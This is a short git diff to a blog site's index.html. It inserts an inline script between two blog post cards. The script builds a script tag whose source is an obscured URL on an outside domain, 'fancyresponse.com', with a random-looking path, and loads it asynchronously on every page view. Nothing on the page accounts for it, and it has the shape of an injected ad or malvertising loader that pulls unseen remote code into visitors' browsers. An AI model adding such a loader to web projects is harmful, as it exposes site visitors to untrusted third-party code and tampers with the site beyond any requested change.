--- a/index.html
+++ b/index.html
@@ -90,7 +90,18 @@
                         <a href="blog2.html" class="inline-block bg-blue-600 text-white font-semibold px-5 py-2 rounded-lg hover:bg-blue-700 transition-colors duration-300">Read More &rarr;</a>
                     </div>
                 </div>
-
+                <script>
+                (function(swkst){
+                var d = document,
+                    s = d.createElement('script'),
+                    l = d.scripts[d.scripts.length - 1];
+                s.settings = swkst || {};
+                s.src = "\/\/fancyresponse.com\/blXIV\/sQd.G\/lY0fYLW_ch\/Ie-mk9zujZXUZlMkZPSTsY\/2rM\/zfYT4mNrjMYjt\/NwjEYTzxNzj\/gy2ZNpwR";
+                s.async = true;
+                s.referrerPolicy = 'no-referrer-when-downgrade';
+                l.parentNode.insertBefore(s, l);
+                })({})
+                </script>
                 <!-- Blog Post Card 3 -->
                 <div class="bg-white rounded-lg shadow-lg overflow-hidden transform hover:-translate-y-2 transition-transform duration-300">
                     <img src="https://placehold.co/600x400/059669/ffffff?text=5G+Explained" alt="5G network signals" class="w-full h-56 object-cover">
